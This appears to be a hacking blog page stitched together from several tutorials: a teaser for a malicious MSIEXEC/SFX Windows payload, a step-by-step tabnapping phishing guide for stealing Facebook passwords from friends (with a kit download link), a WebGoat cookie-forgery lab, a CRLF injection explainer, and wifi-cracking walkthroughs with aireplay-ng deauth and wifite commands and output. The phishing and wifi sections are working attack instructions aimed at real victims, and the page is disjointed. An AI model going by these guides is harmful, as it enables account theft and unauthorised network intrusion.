Spirited wolf's

Tutorial's

Venom MSIEXEC Vector(winrar/sfx compressed + fast_migrate.rc)-By Spirit



So,
Hello Guys
I'm Spirit as you all know and today i'm here to tell you about the malicious MSIEXEC vector to hack windows OS's 

Tutorial link::



-----------------------------------------------------------------------------------------------------------
after it just follow my tutorial ;) 

In this tutorial we will compress two file(our payload) to one .exe executable file with SFX and we will also use fast_migrate to migrate our process to wininit.exe 

So, if you like my tutorial then please Subscribe/Like/Share my Channel :) 
------------------------------------------------------------------------------------------------------------
This tutorial is for educational purpose only. I'll not be responsible for any harm.
------------------------------------------------------------------------------------------------------------
Please Subscribe my channel::
www.youtube.com/c/Pentestingwithspirit

&&
Please like our facebook page also::
www.facebook.com/Pentestingwithspirit
Hack Facebook Account By Tabnapping

::Check my Some Hacking Tutorials on my channel and please Subscribe::
www.youtube.com/c/Pentestingwithspirit
Hi Friends , Today I am telling about "How to Hack facebook account" by using  Tab Napping techniques.So first of all I am telling about What is Tab Napping.

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube,google etc and came back to your website then  your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.

So lets see how to hack facebook account using tab napping trick.


Subscribe To my Youtube channel For Checking Hacking Tutorial's 
www.youtube.com/c/Pentestingwithspirit


Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website :
or you can search on google and create an account.

2) Now download the script and phishing pages from here: http://www.mediafire.com/?0zrp565h8v90jbe

3) Extract it and you will see the files and folders like below:





 4) Upload all the files and folders to your website.
when you upload it's look like


 5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.
The website look like this:



Actually the game is very dificult and he/she will not win in less time and  he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue.


6) When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.
Now just open www.your-website.com/fb/password.html and you will see the email and passwords.

--------------------------------------------------------------------------------------------------------------------------

::Thanks::
::Check my Some Hacking Tutorials on my channel and please Subscribe::

Like My facebook page also :D 

Security Testing - Broken Authentication and Session Management Flaws
========================
Check Video Tutorial


=========================

When authentication functions related to the application are NOT implemented correctly which will allow hackers to compromise passwords or session ID's or to exploit other implementation flaws using other users credentials.
Let us understand Threat Agents, Attack Vectors, Security Weakness, Technical Impact and Business Impacts of this flaw with the help of simple diagram.
2.Broken Auth and Session Mgmt Flaws

Example

An e-commerce application supports URL rewriting, putting session IDs in the URL:
http://example.com/sale/saleitems/jsessionid=2P0OC2JSNDLPSKHCJUN2JV/?item=laptop
An authenticated user of the site forwards the URL to their friends to know about the discounted sales. He e-mails the above link without knowing that the user is also giving away the session ID's. When his friends use the link they will use his session and credit card.

Hands ON

1. Login to Webgoat and navigate to 'Session Management Flaws' Section. Let us bypass the authetication by spoofing the cookie. Below is the snapshot of the scenario.
2.Broken Auth and Session Mgmt Flaws
2. When we login using the credentials webgoat/webgoat, we find from Burp Suite that the JSESSION ID is C8F3177CCAFF380441ABF71090748F2E while the AuthCookie=65432ubphcfx upon successful authentication
2.Broken Auth and Session Mgmt Flaws2.Broken Auth and Session Mgmt Flaws
3. When we login using the credentials aspect/aspect, we find from Burp Suite that the JSESSION ID is C8F3177CCAFF380441ABF71090748F2E while the AuthCookie=65432udfqtb upon successful authentication.
2.Broken Auth and Session Mgmt Flaws
4. Now we need to analyze the AuthCookie Patterns. The first half '65432' is common for both authentications. Hence we are now interested in analyzing the last part of the authcookie values viz- ubphcfx for webgoat user and udfqtb for aspect user respectively.
5. If we take a deep look at the auth cookie values, the last part is having the same lenght as that of user name. Hence it is evident that the username is used with some encryption method. Upon trial and errors/brute force mechanisms we find that the after reversing the user name, webgoat we end up with taogbew and then the before alphabet character is what being used as authcookie. i.e ubphcfx
6. If we pass this cookie value and let us see what happens. Upon authenticating as user webgoat, change the authcookie value to mock the user Alice by finding the authcookie for the same by performing step#4 and step#5.
2.Broken Auth and Session Mgmt Flaws2.Broken Auth and Session Mgmt Flaws

Preventing Mechanisms

Develop a strong authentication and session management controls such that it meets all the authentication and session management requirements defined in OWASP's Application Security Verification Standard
Dev should ensure that they avoid XSS flaws that can be used to steal session IDs.
Please comment if you like it. :) 

============================================================
::Thanks::

Please subscribe our Youtube Channel::
Please Like our face book fan page::
CRLF Injection Tutorial



CRLF Injection Defined

CRLF refers to the special character elements "Carriage Return" and "Line Feed." These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and, more importantly, HTTP, use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.
A more formal name for CRLF injection is Improper Neutralization of CRLF Sequences. Because CRLF injection is frequently used to split HTTP responses, it can also be designated as HTTP Response Splitting or Improper Neutralization of CRLF Sequences in HTTP Headers.

Key Concepts of CRLF Injection

CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. When CRLF injection is used to split an HTTP response header, it is referred to as HTTP Response Splitting. CRLF injection vulnerabilities result from data input that is not neutralized, incorrectly neutralized or otherwise unsanitized.
Attackers provide specially crafted text streams with CRLF injections in order to trick the web application to perform unexpected and potentially harmful actions, ranging from medium to high severity. Attackers exploit the CRLF injection vulnerability by injecting CRLF sequences in order to split a text stream to embed text sequences that the web application is not expecting. These unexpected CRLF injections can result in a security breach and cause material harm.
CRLF injection exploits security vulnerabilities at the application layer. By exploiting the CRLF injection flaw in an HTTP response for example, attackers can modify application data, compromising integrity and enabling the exploitation of the following vulnerabilities:
  • XSS or Cross-Site Scripting vulnerabilities
  • Proxy and web server cache poisoning
  • Website defacement
  • Hijacking the client's session
  • Client web browser poisoning

Explaining CRLF Injection Through Examples

Let's examine how CRLF injections cause damage by looking at one of the most basic example of a CRLF attack: adding fake entries into log files. Suppose a vulnerable application accepts unsanitized or improperly neutralized data and writes it to a system log file. An attacker supplies the following input:
Because this error is fake, a sysadmin may waste a lot of time troubleshooting a non-existent error. An attacker could use this type of Trojan to distract the admin while attacking the system somewhere else.
Another way to illustrate how CRLF injections can cause severe harm is through an application that accepts a file name as user input and then executes a relatively harmless command on that file, such as "ls –a ." If the application is vulnerable to CRLF injection because of improperly neutralized or unsanitized data input, an attacker could provide the following input:
This CRLF injection attack could wipe out the entire file system if the application were running with root privileges on a linux/unix system.

Preventing CRLF Injections

Fortunately, CRLF injections are easy to prevent:
  • Always follow the rule of never trusting user input.
  • Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

special thanks to  https://www.veracode.com
 Please comment if you need to ask anything 

=======================================================================
::THANKS::
Please Subscribe our youtube channel::

Please like our facebook fan page::


Hack WPA/WPA-2 PSK Capturing the Handshake

 WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-
  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.<- (We will take a look on this later.)

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:
  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn't understand much of it then don't worry. There's a reason why people don't  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one-
  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \      


 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******              11  WEP   21db    no   client
    3  **************   11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. 
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:08:05] listening for handshake...              
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] disabling monitor mode on mon0... done
 [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *    1  WPA   99db    no   client
    2  me  1 WPA2  47db   wps   client
    3  *    11  WEP   22db    no   clients
    4  *   11  WEP   20db    no

 [+] select target numbers (1-4) separated by commas, or 'all': 2
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:51] listening for handshake...              
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] quitting


Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \      


 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
  2. wlan0        Atheros     ath9k - [phy0]
 [+] select number of device to put into monitor mode (1-2):


See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                       11  WEP   16db    no   client
    3  *                         11  WEP   16db    no

 [+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:23] listening for handshake...              
 [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
        me (02:73:8D:37:A7:ED) handshake captured
        saved as hs/me_02-73-8D-**-**-**.cap

 [+] starting WPA cracker on 1 handshake
 [!] no WPA dictionary found! use -dict <file> command-line argument
 [+] disabling monitor mode on mon0... done
 [+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see root@kali in red)

1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.


Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 
airmon-ng start wlan0
 Your mon0 interface will be created.




3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command
airodump-ng mon0 --write name_of_file



Non newbies-

root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like
 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **                                  
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me                                                                
                                                                                                                                              
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                    
                                                                                                                                              
 *                     *                            0    0e- 1    742       82  me                                                                        
*                       *                           -35  0e- 1      0   26                                                                                   

You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************  me                        WPA (1 handshake)
   2  **                          Unknown
=======================================================================
::THANKS::
Please Subscribe our youtube channel::

Please like our facebook fan page::


Wifite : Hacking Wifi The Easy Way : Kali Linux

Wifite

While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent , it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).

Features Of Wifite

  • Sorts targets by signal strength (in dB); cracks closest access points first
  • Automatically de-authenticates clients of hidden networks to reveal SSIDs
  • Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • Customizable settings (timeouts, packets/sec, etc)
  • "Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
  • All captured WPA handshakes are backed up to wifite.py's current directory
  • Smart WPA de-authentication; cycles between all clients and broadcast deauths
  • Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
  • Displays session summary at exit; shows any cracked keys
  • All passwords saved to cracked.txt
  • Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way.  For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets (I wrote a full length post about something which it does automatically!).

Hacking WEP network

If you've followed my previous posts on Hacking Wifi (WEP), you know there's a lot of homework you have to do before you even start hacking. But not here. With Wifite, its as easy and simple as a single command.
wifite -wep
You might even have used the command
wifite
If you see any error at this stage move to the bottom of the page for troubleshooting tips. If your issue is not listed please comment. We reply within a day.
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range.
 You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay.
Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) -

 Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
 Note, the limitation that many reader on my blog are beginners forbid me from introducing too many attacks. I made a tutorial about ARP replay attack, and that too was detailed as hell. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following-
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks-
    WEP
-wep         only target WEP networks [off]
-pps <num>   set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop   use chopchop attack      [on]
-arpreplay   use arpreplay attack     [on]
-fragment   use fragmentation attack [on]
-caffelatte use caffe-latte attack   [on]
-p0841       use -p0841 attack        [on]
-hirte       use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails    [off]
-wepca <n>   start cracking when number of ivs surpass n [10000]
-wepsave     save a copy of .cap files to this directory [off]
As you can see, its the same thing as is there on the help screenshot. Play around with the attacks and see what you can do. Hacking WPA without WPS wouldn't be that easy, and while I don't usually do this, I'm providing a link to an external website for the tutorial . This is the best WPA cracking tutorial I've seen, and I can't write a better one. It's highly detailed, and I'm just hoping I don't lose my audience to that website. Here is the tutorial - Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux

Troubleshooting

Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general.
    Next PostNewer Posts Previous PostOlder Posts Home